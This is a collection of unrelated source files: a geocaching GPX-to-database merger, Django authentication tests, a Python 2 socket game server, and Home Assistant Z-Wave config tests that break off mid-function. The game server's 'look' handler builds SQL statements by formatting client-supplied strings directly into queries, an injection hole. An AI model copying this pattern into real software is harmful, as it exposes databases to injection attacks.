# copy some values from the waypoint, so that join statements
# can be avoided
wpt.cache.db['hidden'] = wpt.db['time']
wpt.cache.db['lat'] = wpt.db['lat']
wpt.cache.db['lon'] = wpt.db['lon']
wpt.cache.db['gc_code'] = wpt.db['name']
wpt.cache.db['url'] = wpt.db['url']
wpt.cache.db['found'] = (wpt.sym == 'Geocache Found')
return wpt
def _parse_cache(self, node):
cache = Cache()
cache.db['last_updated'] = self.last_updated
cache.db['id'] = int(node.get("id"))
cache.db['available'] = (node.get("available") == "True")
cache.db['archived'] = (node.get("archived") == "True")
for child in node:
if child.tag == GS+"name":
cache.db['name'] = child.text
elif child.tag == GS+"placed_by":
cache.db['placed_by'] = child.text
elif child.tag == GS+"owner":
owner_id = int(child.get("id"))
self.cacher_itf.create_singleton(owner_id, child.text)
cache.db['owner_id'] = owner_id
# geocache_db.create_singleton_id(Cacher, {'id': child.get("id") , 'name': child.text})
elif child.tag == GS+"type":
#cache.db['type_id'] = geocache_db.create_singleton_id(CacheType, {'name': child.text})
cache.db['type_id'] = self.cache_type_itf.create_singleton_value('name', child.text)
elif child.tag == GS+"container":
#cache.db['container_id'] = geocache_db.create_singleton_id(CacheContainer, {'name': child.text})
cache.db['container_id'] = self.cache_container_itf.create_singleton_value('name', child.text)
elif child.tag == GS+"difficulty":
cache.db['difficulty'] = float(child.text)
elif child.tag == GS+"terrain":
cache.db['terrain'] = float(child.text)
elif child.tag == GS+"country":
#cache.db['country_id'] = geocache_db.create_singleton_id(CacheCountry, {'name': child.text})
cache.db['country_id'] = self.cache_country_itf.create_singleton_value('name', child.text)
elif child.tag == GS+"state":
#cache.db['state_id'] = geocache_db.create_singleton_id(CacheState, {'name': child.text})
cache.db['state_id'] = self.cache_state_itf.create_singleton_value('name', child.text)
elif child.tag == GS+"short_description":
cache.db['short_desc'] = child.text
cache.db['short_html'] = (child.get("html") == "True")
elif child.tag == GS+"long_description":
cache.db['long_desc'] = child.text
cache.db['long_html'] = (child.get("html") == "True")
elif child.tag == GS+"encoded_hints":
cache.db['encoded_hints'] = child.text
elif child.tag == GS+"attributes":
cache.attributes = []
for node_attr in child:
if node_attr.tag == GS+"attribute":
cache.attributes.append(self._parse_attribute(node_attr))
elif child.tag == GS+"logs":
cache.logs = []
for node_log in child:
if node_log.tag == GS+"log":
cache.logs.append(self._parse_log(node_log, cache.db['id']))
return cache
def _parse_attribute(self, node):
attr = Attribute()
attr.db['gc_id'] = int(node.get("id"))
attr.db['inc'] = (node.get("inc") == "1")
attr.db['name'] = node.text
return attr
def _parse_log(self, node, cache_id):
log = Log()
log.db['id'] = int(node.get("id"))
log.db['cache_id'] = cache_id
for log_node in node:
if log_node.tag == GS+"date":
log.db['date'] = log_node.text
elif log_node.tag == GS+"type":
#log.db['type_id'] = geocache_db.create_singleton_id(LogType, {'name': log_node.text})
log.db['type_id'] = self.log_type_itf.create_singleton_value('name', log_node.text)
elif log_node.tag == GS+"finder":
log.db['finder_id'] = int(log_node.get("id"))
log.finder = log_node.text
elif log_node.tag == GS+"text":
log.db['text'] = log_node.text
log.db['text_encoded'] = (log_node.get("encoded") == "True")
elif log_node.tag == GS+"log_wpt":
log.db['lat'] = float(log_node.get("lat"))
log.db['lon'] = float(log_node.get("lon"))
return log
def _merge_wpt(self, wpt):
gc_code = wpt.db['gc_code']
#cache_exists = geocache_db.get_singleton_id(Cache, {'gc_code': gc_code}) != None
cache_exists = self.cache_itf.get_id('gc_code', gc_code) is not None
if cache_exists:
if gc_code == wpt.db['name']: # waypoint for the cache itself
geocache_db.execute('DELETE FROM waypoint WHERE gc_code = ? AND name = ?', (gc_code, gc_code))
else: # additional waypoint
if gc_code not in self.deleted_wpt:
geocache_db.execute('DELETE FROM waypoint WHERE gc_code = ? AND name != ?', (gc_code, gc_code))
self.deleted_wpt[gc_code] = True
self.waypoint_itf.insert(wpt.db)
if wpt.cache is not None:
self._merge_cache(wpt.cache, cache_exists)
def _merge_cache(self, cache, cache_exists):
last_logs = self._merge_logs(cache.logs, cache.db['id'])
cache.db['last_logs'] = last_logs
if cache_exists:
self.cache_itf.update(cache.db['id'], cache.db)
else:
self.cache_itf.insert(cache.db)
self._merge_attributes(cache.attributes, cache.db['id'], cache_exists)
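# Merge GPX logs with the logs already stored for this cache: existing logs are updated,
# new ones inserted, and anything beyond the `max_logs` most recent entries is deleted
# unless it was written by `pref_owner`. Returns a semicolon-joined summary of the five
# most recent log types.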
def _merge_logs(self, logs, cache_id):
db_logs = self.log_itf.get_cache_logs(cache_id)
merged_array = []
for log in logs:
if log.db['id'] in db_logs:
del db_logs[log.db['id']]
merged_array.append({'id': log.db['id'], 'date': log.db['date'], 'finder': log.finder, 'type_id': log.db['type_id'], 'action': 'update', 'db': log.db})
else:
merged_array.append({'id': log.db['id'], 'date': log.db['date'], 'finder': log.finder, 'type_id': log.db['type_id'], 'action': 'insert', 'db': log.db})
for log in db_logs.values():
merged_array.append(log)
sorted_logs = sorted(merged_array, key=lambda log: log['date'], reverse=True)
log_cntr = 1
for log in sorted_logs:
if (log_cntr <= self.max_logs) or (log['finder'] == self.pref_owner):
if log['action'] == 'insert':
self.cacher_itf.create_singleton(log['db']['finder_id'], log['finder'])
self.log_itf.insert(log['db'])
elif log['action'] == 'update':
self.cacher_itf.create_singleton(log['db']['finder_id'], log['finder'])
self.log_itf.update(log['id'], log['db'])
else:
self.log_itf.delete('id', log['id'])
log_cntr = log_cntr + 1
last_logs = ';'.join([self.log_type_itf.get_value(log['type_id'], 'name') for log in sorted_logs[:5]])
return last_logs
def _merge_attributes(self, attributes, cache_id, cache_exists):
if cache_exists:
self.cache_to_attribute_itf.delete('cache_id', cache_id)
for attr in attributes:
id = geocache_db.create_singleton_id(Attribute, attr.db)
self.cache_to_attribute_itf.insert({'cache_id': cache_id, 'attribute_id': id})
class AttributeInterface(DbInterface):
def __init__(self, db, cls):
DbInterface.__init__(self, db, cls)
def get_id(self, columns):
if self._reverse_lookup_table is None:
self._reverse_lookup_table = {}
for row in self.execute('SELECT id, gc_id, inc, name FROM attribute'):
vals = '|'.join([str(row['gc_id']), str(int(row['inc'])), row['name']])
self._reverse_lookup_table[vals] = row['id']
vals = '|'.join([str(columns['gc_id']), str(int(columns['inc'])), columns['name']])
if vals in self._reverse_lookup_table:
return self._reverse_lookup_table[vals]
else:
return None
def create_singleton(self, columns):
id = self.get_id(columns)
if id is not None:
return id
self.insert(columns)
id = self.db.cursor.lastrowid
vals = '|'.join([str(columns['gc_id']), str(int(columns['inc'])), columns['name']])
self._reverse_lookup_table[vals] = id
if self._lookup_table is not None:
# the original referenced an undefined 'value'; cache the attribute name here,
# mirroring the id -> name lookup used by the other interfaces
self._lookup_table[id] = columns['name']
return id
class CacherInterface(DbInterface):
def __init__(self, db, cls):
DbInterface.__init__(self, db, cls)
def create_singleton(self, id, name):
db_name = self.get_value(id, 'name')
if db_name is None:
self.insert({'id': id, 'name': name})
self._lookup_table[id] = name
if self._reverse_lookup_table is not None:
self._reverse_lookup_table[name] = id
else:
if name != db_name:
self.update(id, {'name': name})
self._lookup_table[id] = name
if self._reverse_lookup_table is not None:
self._reverse_lookup_table[name] = id
class LogInterface(DbInterface):
def __init__(self, db, cls):
DbInterface.__init__(self, db, cls)
self._pool = {}
for row in self.execute('SELECT id, date, cache_id, finder_id, type_id FROM log'):
if row['cache_id'] not in self._pool:
self._pool[row['cache_id']] = {}
self._pool[row['cache_id']][row['id']] = {'id': row['id'], 'date': row['date'], 'finder_id': row['finder_id'], 'type_id': row['type_id'], 'action': 'none'}
def get_cache_logs(self, cache_id):
if cache_id in self._pool:
return self._pool[cache_id]
else:
return {}
|
|
import json
from django.contrib.auth import authenticate
from django.contrib.auth import get_user_model
from django.contrib.sessions.models import Session
from django.core import mail
from django.test import TestCase
from django.test.client import Client
from django.core.urlresolvers import reverse
from rest_framework import status
from rest_framework.test import APIClient
from rest_framework.authtoken.models import Token
from .utils import obj_is
from .api_utils import is_user_me
from ..factories import AccountFactory
from .. import settings
Account = get_user_model()
class PasswordlessAuthTest(TestCase):
ACCOUNT_PASSWORD = 'test'
def setUp(self, *args, **kwargs):
super(PasswordlessAuthTest, self).setUp(*args, **kwargs)
self.account_1 = Account(email='test1@taggler.com')
self.account_1.set_password(self.ACCOUNT_PASSWORD)
self.account_1.save()
self.passwordless = Account(email='passwordless@taggler.com')
self.passwordless.save()
def test_email_password_auth(self):
self.assertTrue(authenticate(email=self.account_1.email, password=self.ACCOUNT_PASSWORD))
def test_email_password_fails_for_wrong_password(self):
self.assertFalse(authenticate(email=self.account_1.email, password=self.ACCOUNT_PASSWORD*2))
def test_email_password_fails_for_wrong_email(self):
self.assertFalse(authenticate(email=self.account_1.email*2, password=self.ACCOUNT_PASSWORD))
def test_email_password_fails_for_wrong_password_and_email(self):
self.assertFalse(authenticate(email=self.account_1.email*2, password=self.ACCOUNT_PASSWORD*2))
def test_email_password_fails_for_blank_email(self):
self.assertFalse(authenticate(email='', password=''))
def test_passwordless_auth(self):
self.assertTrue(authenticate(passwordless_key=self.passwordless.passwordless_key))
def test_passwordless_auth_fails_for_registered_users(self):
self.assertFalse(authenticate(passwordless_key=self.account_1.passwordless_key))
def test_is_passwordless_property(self):
self.assertTrue(self.passwordless.is_passwordless, msg="Passwordless user is not correctly detected")
self.assertFalse(self.account_1.is_passwordless, msg="User with password is incorrectly flagged as passwordless")
def test_passwordless_login_middleware(self):
c = Client()
def get_sessionid(response):
return response.cookies.get('sessionid').value
# Verify we don't have a cookie set when hitting the login page without login
response = c.get('/login')
self.assertIsNone(response.cookies.get('sessionid'))
# Verify the cookie is set after hitting the homepage with a passwordless login
response = c.get('/login', {settings.PASSWORDLESS_GET_PARAM: self.account_1.passwordless_key})
session = Session.objects.get(session_key=get_sessionid(response))
uid = session.get_decoded().get('_auth_user_id')
users = Account.objects.filter(pk=uid)
self.assertEqual(users.count(), 1)
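# The one-time key middleware is expected to log the user in from a GET parameter and
# to rotate the key after use; both behaviours are checked below.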
class OneTimeAuthenticationKeyAuthTest(TestCase):
ACCOUNT_PASSWORD = 'test'
def setUp(self, *args, **kwargs):
super(OneTimeAuthenticationKeyAuthTest, self).setUp(*args, **kwargs)
self.account_1 = Account(email='test1@taggler.com')
self.account_1.set_password(self.ACCOUNT_PASSWORD)
self.account_1.save()
def test_one_time_authentication_key_middleware(self):
c = Client()
def get_sessionid(response):
return response.cookies.get('sessionid').value
# Verify we don't have a cookie set when hitting the login page without login
response = c.get('/login')
self.assertIsNone(response.cookies.get('sessionid'))
# Save one time authentication key
one_time_authentication_key = self.account_1.one_time_authentication_key
# Verify the cookie is set after hitting the homepage with a one time authentication key
response = c.get('/login', {settings.ONE_TIME_AUTHENTICATION_KEY_GET_PARAM: one_time_authentication_key})
session = Session.objects.get(session_key=get_sessionid(response))
uid = session.get_decoded().get('_auth_user_id')
users = Account.objects.filter(pk=uid)
self.assertEqual(users.count(), 1)
# Check that one time authentication key changed upon use
self.assertNotEqual(users[0].one_time_authentication_key, one_time_authentication_key)
class SignupEmailTest(TestCase):
ACCOUNT_EMAIL = 'customer@taggler.com'
ACCOUNT_PASSWORD = 'password'
def test_signup_email_sent(self):
self.account = Account(email=self.ACCOUNT_EMAIL)
self.account.set_password(self.ACCOUNT_PASSWORD)
self.account.save()
self.assertTrue(authenticate(email=self.account.email, password=self.ACCOUNT_PASSWORD))
class ApiAuthTest(TestCase):
def setUp(self):
super(ApiAuthTest, self).setUp()
self.client = APIClient()
self.email = 'shane@clearsumm.it'
self.password = 'ultrapress'
def test_auth_login(self):
self.test_auth_signup_with_password()
response = self.client.post(reverse('account-login'), data={'email': self.email, 'password': self.password}, format='json')
self.assertEqual(response.status_code, status.HTTP_200_OK, msg=str(response.status_code) + ': ' + str(response.content))
content = response.content.decode("utf-8")
self.assertTrue(obj_is(content, is_user_me), msg=content)
def test_auth_login_with_wrong_password(self):
self.test_auth_signup_with_password()
response = self.client.post(reverse('account-login'), data={'email': self.email, 'password': self.password*2}, format='json')
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST, msg=response.status_code)
def test_auth_signup_passwordless(self):
response = self.client.post(reverse('account-signup'), data={'email': self.email}, format='json')
self.assertEqual(response.status_code, status.HTTP_200_OK, msg=str(response.status_code) + ': ' + str(response.content))
content = response.content.decode("utf-8")
self.assertTrue(obj_is(content, is_user_me), msg=content)
account = Account.objects.get(email=self.email)
self.assertTrue(account.is_passwordless)
def test_auth_signup_email_taken(self):
self.test_auth_signup_passwordless()
response = self.client.post(reverse('account-signup'), data={'email': self.email}, format='json')
self.assertEqual(response.status_code, status.HTTP_412_PRECONDITION_FAILED, msg=str(response.status_code) + ': ' + str(response.content))
def test_auth_signup_with_password(self):
response = self.client.post(reverse('account-signup'), data={'email': self.email, 'password': self.password}, format='json')
self.assertEqual(response.status_code, status.HTTP_200_OK, msg=str(response.status_code) + ': ' + str(response.content))
content = response.content.decode("utf-8")
self.assertTrue(obj_is(content, is_user_me), msg=content)
account = Account.objects.get(email=self.email)
self.assertFalse(account.is_passwordless)
def test_auth_logout(self):
response = self.client.delete(reverse('account-logout'), format='json')
self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT, msg=str(response.status_code) + ': ' + str(response.content))
def test_password_reset(self):
# check that a non-existent email sends back an error
response = self.client.post(reverse('account-reset-password'), data={'email': self.email}, format='json')
self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND, msg=str(response.status_code) + ': ' + str(response.content))
self.assertEqual(len(mail.outbox), 0)
# check that existing email sends back a good response and sends an email
account = AccountFactory(email=self.email)
num_emails = len(mail.outbox)
response = self.client.post(reverse('account-reset-password'), data={'email': account.email}, format='json')
self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT, msg=str(response.status_code) + ': ' + str(response.content) + ': ' + str(account.email))
self.assertEqual(len(mail.outbox), num_emails + 1)
def test_change_email(self):
NEW_EMAIL = 'asdasfasdf@adsfasf.com'
NEW_MISMATCH_EMAIL = NEW_EMAIL + 'd'
NEW_FAIL_EMAIL = 'adsfasdfasdfasdf'
WRONG_PASSWORD = self.password + '1'
self.test_auth_signup_with_password()
account = Account.objects.all()[0]
self.assertEqual(account.email, self.email)
# check that change email works when email and confirm_email are the same
header = {'HTTP_AUTHORIZATION': 'Token {}'.format(Token.objects.get(user=account).key)}
response = self.client.patch('/api/v1/accounts/change_email/', data={'email': NEW_EMAIL, 'confirm_email': NEW_EMAIL, 'password': self.password}, format='json', **header)
self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT, msg=str(response.status_code) + ': ' + str(response.content))
account = Account.objects.all()[0]
self.assertEqual(account.email, NEW_EMAIL)
# check that change email failed when email and confirm_email are different
header = {'HTTP_AUTHORIZATION': 'Token {}'.format(Token.objects.get(user=account).key)}
response = self.client.patch('/api/v1/accounts/change_email/', data={'email': NEW_MISMATCH_EMAIL, 'confirm_email': NEW_EMAIL, 'password': self.password}, format='json', **header)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST, msg=str(response.status_code) + ': ' + str(response.content))
content = json.loads(response.content.decode("utf-8"))
self.assertEqual(content['error'], "EMAIL MISMATCH")
account = Account.objects.all()[0]
self.assertNotEqual(account.email, NEW_MISMATCH_EMAIL)
self.assertEqual(account.email, NEW_EMAIL)
# check that change email failed when email is invalid
header = {'HTTP_AUTHORIZATION': 'Token {}'.format(Token.objects.get(user=account).key)}
response = self.client.patch('/api/v1/accounts/change_email/', data={'email': NEW_FAIL_EMAIL, 'confirm_email': NEW_FAIL_EMAIL, 'password': self.password}, format='json', **header)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST, msg=str(response.status_code) + ': ' + str(response.content))
content = json.loads(response.content.decode("utf-8"))
self.assertEqual(content['error'], "EMAIL INVALID")
account = Account.objects.all()[0]
self.assertNotEqual(account.email, NEW_FAIL_EMAIL)
self.assertEqual(account.email, NEW_EMAIL)
# check that change email failed when password is invalid
header = {'HTTP_AUTHORIZATION': 'Token {}'.format(Token.objects.get(user=account).key)}
response = self.client.patch('/api/v1/accounts/change_email/', data={'email': NEW_FAIL_EMAIL, 'confirm_email': NEW_FAIL_EMAIL, 'password': WRONG_PASSWORD}, format='json', **header)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST, msg=str(response.status_code) + ': ' + str(response.content))
content = json.loads(response.content.decode("utf-8"))
self.assertEqual(content['error'], "BAD PASSWORD")
account = Account.objects.all()[0]
self.assertNotEqual(account.email, NEW_FAIL_EMAIL)
self.assertEqual(account.email, NEW_EMAIL)
# check that change email failed when email isn't sent
header = {'HTTP_AUTHORIZATION': 'Token {}'.format(Token.objects.get(user=account).key)}
response = self.client.patch('/api/v1/accounts/change_email/', data={}, format='json', **header)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST, msg=str(response.status_code) + ': ' + str(response.content))
content = json.loads(response.content.decode("utf-8"))
self.assertEqual(content['error'], "EMAIL MISSING")
account = Account.objects.all()[0]
self.assertEqual(account.email, NEW_EMAIL)
def test_change_password(self):
NEW_PASSWORD = self.password + '1'
BAD_PASSWORD_REPEAT = NEW_PASSWORD + '2'
WRONG_PASSWORD = self.password + '3'
self.test_auth_signup_with_password()
account = Account.objects.all()[0]
self.assertEqual(account.email, self.email)
# check that sending the wrong current password fails
header = {'HTTP_AUTHORIZATION': 'Token {}'.format(Token.objects.get(user=account).key)}
response = self.client.patch('/api/v1/accounts/change_password/', data={'current_password': WRONG_PASSWORD, 'password': NEW_PASSWORD, 'password_repeat': NEW_PASSWORD}, format='json', **header)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST, msg=str(response.status_code) + ': ' + str(response.content))
account = Account.objects.all()[0]
self.assertTrue(account.check_password(self.password))
# check that sending mismatching new passwords fails
header = {'HTTP_AUTHORIZATION': 'Token {}'.format(Token.objects.get(user=account).key)}
response = self.client.patch('/api/v1/accounts/change_password/', data={'current_password': self.password, 'password': NEW_PASSWORD, 'password_repeat': BAD_PASSWORD_REPEAT}, format='json', **header)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST, msg=str(response.status_code) + ': ' + str(response.content))
account = Account.objects.all()[0]
self.assertTrue(account.check_password(self.password))
# check that sending matching new passwords and the correct current password succeeds
header = {'HTTP_AUTHORIZATION': 'Token {}'.format(Token.objects.get(user=account).key)}
response = self.client.patch('/api/v1/accounts/change_password/', data={'current_password': self.password, 'password': NEW_PASSWORD, 'password_repeat': NEW_PASSWORD}, format='json', **header)
self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT, msg=str(response.status_code) + ': ' + str(response.content))
account = Account.objects.all()[0]
self.assertTrue(account.check_password(NEW_PASSWORD))
|
|
#!/usr/local/bin/python2.7
# encoding: utf-8
import socket
import sys
import os
import mmap
import json
import datetime
import math
import pymysql
import multiprocessing
import exceptions
import string
import array
import random
import threading
import traceback
import cmd
import errno
#from pyamf import remoting
shutdown = False
class TerminalNode(object):
name = ''
posx = 0
posy = 0
posz = 0
inventory = []
players = []
def run(self):
self.host = 'IP_ADDRESS'
self.port = 9997
log('Server started')
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.sock.bind(('', self.port))
self.sock.listen(3)
try:
while True:
if shutdown == True:
self.sock.shutdown(1)
self.sock.close()
break
self.socket = self.sock.accept()
p = multiprocessing.Process(target=self.handle, args=(self.socket[0], self.socket[1], self.players))
p.start()
except socket.error, e:
log( 'Error accepting connection: %s' % e[1])
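# Per-connection handler (runs in its own process). Wire messages have the form
# "action%encoding%data"; the encoding flag selects how `data` is decoded before the
# request is dispatched to the matching player-interface method (join/move/look/say/grab).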
def handle(self, conn, addr, players):
self.db = pymysql.connect(host='MYSQL_HOST', user='MYSQL_USERNAME', passwd='MYSQL_PASSWORD', db='MYSQL_DATABASE')
addrstr = '%s:%s' % (addr[0],addr[1])
try:
log( 'Connection opened: %s' % addrstr)
#with contextlib.closing(conn):
while True:
# It's possible that we won't get the entire request in
# a single recv, but very unlikely.
data = conn.recv(2048)
if data == '':
self.db.close();
log('Connection closed: %s' % addrstr)
break
if '\n' in data:
log('break found')
dataList = data.split("%")
if len(dataList) > 2:
action = str(dataList[0])
# 0 = no encoding, 1 = json without keys, 2 = json with keys
encoding = int(dataList[1])
data = dataList[2]
log('received: ' + action + ' from ' + str(addr) + ' with data ' + data)
pdata = self.decode(encoding, data)
# Virtual Player Interface
if action == 'join':
self.join(encoding, pdata, conn, addr)
if action == 'move':
self.move(encoding, pdata, conn, addr)
if action == 'look':
self.look(encoding, pdata, conn, addr)
if action == 'say':
self.say(encoding, pdata, conn, addr)
if action == 'grab':
self.grab(encoding, pdata, conn, addr)
except socket.error, e:
log( 'Error handling connection from %s: %s' % (addrstr, e))
except Exception, e:
log('Error handling connection from %s: %s' % (addrstr, e))
# method to encode and send data
def sendData(self, encoding, action, pdata, conn, addr):
message = self.encode(encoding, pdata)
tosend = action+'%'+str(encoding)+'%'+str(message)+'%;'
if len(str(message)) > 100:
log('SENDING: '+action+'%'+str(encoding)+'%LARGE DATA SET')
else:
log( tosend)
try:
conn.sendall(tosend)
except socket.error, e:
if isinstance(e.args, tuple):
log( "errno is %d" % e[0])
if e[0] == errno.EPIPE:
# remote peer disconnected
log( "Detected remote disconnect")
else:
# determine and handle different error
pass
else:
log( "socket error %s" % e)
self.sock.close()
# 0 = skip encoding, 1 = encode list and dict, 2 = reserved for future encodings
def encode(self, encoding, data):
if encoding == 0:
return data
elif encoding == 1:
return json.dumps(data, separators=(',',':'))
else:
return json.JSONEncoder().encode(data)
# decode json to dict or list if reqired
def decode(self, encoding, data):
if encoding == 0:
return data
elif encoding == 1:
return json.loads(data)
else:
return json.JSONDecoder().decode(data)
def join(self, encoding, pdata, conn, addr):
self.sendData(0, 'join', 'player'+str(len(self.players)), conn, addr)
def move(self, encoding, pdata, conn, addr):
pass
def look(self, encoding, pdata, conn, addr):
level = int(pdata[0])
exp = int(pdata[1])
location = int(pdata[2])
ship = int(pdata[3])
money = int(pdata[4])
username = str(pdata[5])
timesPlayed = int(pdata[6])
armor = int(pdata[7])
energy = int(pdata[8])
turrets = str(pdata[9])
modules = str(pdata[10])
plugins = str(pdata[11])
cargo = str(pdata[12])
lastPlayed = int(pdata[13])
if lastPlayed == False:
lastPlayed = 0;
uid = int(pdata[14])
cur1 = self.db.cursor()
try:
cur1.execute("DELETE FROM wts_players WHERE uid = '%d' LIMIT 1" % (uid))
except Exception, e:
log( 'unable to delete')
log( e)
cur2 = self.db.cursor()
try:
# don't save records from the development address
if(str(addr[0]) == 'TESTING_MACHINE_IP'):
return
cur2.execute("INSERT INTO wts_players SET uid = '%d', \
address = '%s', \
times_played = '%d', \
level = '%d', \
exp = '%d', \
location = '%d', \
ship = '%d', \
money = '%d', \
username = '%s', \
armor = '%d', \
energy = '%d', \
turrets = '%s', \
modules = '%s', \
plugins = '%s', \
cargo = '%s', \
last_played = '%d'" % \
(uid, str(addr[0]), timesPlayed, level, exp, location, ship, money, username, armor, energy, turrets, modules, plugins, cargo, \
lastPlayed))
except Exception, e:
log( 'unable to save')
log(e)
def say(self, encoding, pdata, conn, addr):
uid = ''.join(random.choice(string.digits) for x in range(8))
self.sendData(0, 'genUID', int(uid), conn, addr)
def grab(self, encoding, pdata, conn, addr):
pass
def log(logtxt):
now = datetime.datetime.now().strftime("%Y-%m-%d %H:%M")
log_file = open("sock_output.txt", "a", 0)
log_file.write(str(now)+' '+ logtxt+'\n')
log_file.close()
print now, logtxt
class CLI(cmd.Cmd):
def __init__(self):
cmd.Cmd.__init__(self)
self.rows, self.columns = os.popen('stty size', 'r').read().split()
self.clr()
PS1='[\h \@]\$ '
print '\033[5'
self.prompt = '> '
self.doc_header = 'Terminal GS Help'
threading.Thread(target = self.cmdloop).start()
def clr(self):
os.system("clear")
padCount = int(self.columns)
titlePad = ' ===Terminal Game Server=== '.center(padCount)
print '\033[32;1;7m\033[40;25;4m\033[150;100'+titlePad+' \033[0m'
print '\033[2;1H\033[J' #position cursor and clear below
print '\033[31;1;237;35;25;7m COMMANDS: \033[22m', ' home stats log help quit '.center(padCount), '\033[0m'
print '\033[3;1H' #position cursor
print ''.ljust(padCount, '-')
print '\033[0m'
# print '\033[4;1H' #position cursor
#print '\033[J' #clear excess from header
def do_home(self, arg):
self.clr()
def do_stats(self, arg):
self.clr()
print len(multiprocessing.active_children()), ' connections'
def do_log(self, arg):
self.clr()
lastLog = self.tail("sock_output.txt", 16)
print "\n".join(lastLog)
def do_q(self, arg):
self.clr()
self.do_quit(arg)
def do_quit(self, arg):
global shutdown
self.clr()
shutdown = True
os.system("clear")
log('Server Shutdown')
for wrkr in multiprocessing.active_children():
wrkr.join()
sys.exit(1)
def default(self, arg):
self.clr()
print arg+' is not a known command. Type help to learn more.'
def help(self):
print '\n'
print 'Type help [command] to learn more about the commands.'
def help_home(self):
self.clr()
print 'Command Help: Home'
print '=================================='
print 'Clear the screen. This is for OCD people.'
def help_stats(self):
self.clr()
print 'Command Help: Stats'
print '=================================='
print 'Show information about the terminal server environment.'
def help_log(self):
self.clr()
print 'Command Help: Log'
print '=================================='
print 'log - Show the last few entries in the log file.'
def styleText(self, style, text):
if style == 'program title':
return '\033[32;1;7m\033[40;25;4m\033[150;100'+text+' \033[0m'
def tail(self, filename, n):
"""Returns last n lines from the filename. No exception handling"""
size = os.path.getsize(filename)
with open(filename, "rb") as f:
# for Windows the mmap parameters are different
fm = mmap.mmap(f.fileno(), 0, mmap.MAP_SHARED, mmap.PROT_READ)
try:
for i in xrange(size - 1, -1, -1):
if fm[i] == '\n':
n -= 1
if n == -1:
break
return fm[i + 1 if i else 0:].splitlines()
finally:
fm.close()
def main():
try:
cli = CLI()
TerminalNode().run()
except Exception, e:
log(str(e))
sys.exit(0)
except KeyboardInterrupt:
sys.exit(0)
if __name__ == '__main__':
main()
|
|
"""Test Z-Wave config panel."""
import json
import pytest
from homeassistant.bootstrap import async_setup_component
from homeassistant.components import config
from homeassistant.components.zwave import DATA_NETWORK, const
from homeassistant.const import HTTP_NOT_FOUND
from tests.async_mock import MagicMock, patch
from tests.mock.zwave import MockEntityValues, MockNode, MockValue
VIEW_NAME = "api:config:zwave:device_config"
@pytest.fixture
def client(loop, hass, hass_client):
"""Client to communicate with Z-Wave config views."""
with patch.object(config, "SECTIONS", ["zwave"]):
loop.run_until_complete(async_setup_component(hass, "config", {}))
return loop.run_until_complete(hass_client())
async def test_get_device_config(client):
"""Test getting device config."""
def mock_read(path):
"""Mock reading data."""
return {"hello.beer": {"free": "beer"}, "other.entity": {"do": "something"}}
with patch("homeassistant.components.config._read", mock_read):
resp = await client.get("/api/config/zwave/device_config/hello.beer")
assert resp.status == 200
result = await resp.json()
assert result == {"free": "beer"}
async def test_update_device_config(client):
"""Test updating device config."""
orig_data = {
"hello.beer": {"ignored": True},
"other.entity": {"polling_intensity": 2},
}
def mock_read(path):
"""Mock reading data."""
return orig_data
written = []
def mock_write(path, data):
"""Mock writing data."""
written.append(data)
with patch("homeassistant.components.config._read", mock_read), patch(
"homeassistant.components.config._write", mock_write
):
resp = await client.post(
"/api/config/zwave/device_config/hello.beer",
data=json.dumps({"polling_intensity": 2}),
)
assert resp.status == 200
result = await resp.json()
assert result == {"result": "ok"}
orig_data["hello.beer"]["polling_intensity"] = 2
assert written[0] == orig_data
async def test_update_device_config_invalid_key(client):
"""Test updating device config."""
resp = await client.post(
"/api/config/zwave/device_config/invalid_entity",
data=json.dumps({"polling_intensity": 2}),
)
assert resp.status == 400
async def test_update_device_config_invalid_data(client):
"""Test updating device config."""
resp = await client.post(
"/api/config/zwave/device_config/hello.beer",
data=json.dumps({"invalid_option": 2}),
)
assert resp.status == 400
async def test_update_device_config_invalid_json(client):
"""Test updating device config."""
resp = await client.post(
"/api/config/zwave/device_config/hello.beer", data="not json"
)
assert resp.status == 400
async def test_get_values(hass, client):
"""Test getting values on node."""
node = MockNode(node_id=1)
value = MockValue(
value_id=123456,
node=node,
label="Test Label",
instance=1,
index=2,
poll_intensity=4,
)
values = MockEntityValues(primary=value)
node2 = MockNode(node_id=2)
value2 = MockValue(value_id=234567, node=node2, label="Test Label 2")
values2 = MockEntityValues(primary=value2)
hass.data[const.DATA_ENTITY_VALUES] = [values, values2]
resp = await client.get("/api/zwave/values/1")
assert resp.status == 200
result = await resp.json()
assert result == {
"123456": {
"label": "Test Label",
"instance": 1,
"index": 2,
"poll_intensity": 4,
}
}
async def test_get_groups(hass, client):
"""Test getting groupdata on node."""
network = hass.data[DATA_NETWORK] = MagicMock()
node = MockNode(node_id=2)
node.groups.associations = "assoc"
node.groups.associations_instances = "inst"
node.groups.label = "the label"
node.groups.max_associations = "max"
node.groups = {1: node.groups}
network.nodes = {2: node}
resp = await client.get("/api/zwave/groups/2")
assert resp.status == 200
result = await resp.json()
assert result == {
"1": {
"association_instances": "inst",
"associations": "assoc",
"label": "the label",
"max_associations": "max",
}
}
async def test_get_groups_nogroups(hass, client):
"""Test getting groupdata on node with no groups."""
network = hass.data[DATA_NETWORK] = MagicMock()
node = MockNode(node_id=2)
network.nodes = {2: node}
resp = await client.get("/api/zwave/groups/2")
assert resp.status == 200
result = await resp.json()
assert result == {}
async def test_get_groups_nonode(hass, client):
"""Test getting groupdata on nonexisting node."""
network = hass.data[DATA_NETWORK] = MagicMock()
network.nodes = {1: 1, 5: 5}
resp = await client.get("/api/zwave/groups/2")
assert resp.status == HTTP_NOT_FOUND
result = await resp.json()
assert result == {"message": "Node not found"}
async def test_get_config(hass, client):
"""Test getting config on node."""
network = hass.data[DATA_NETWORK] = MagicMock()
node = MockNode(node_id=2)
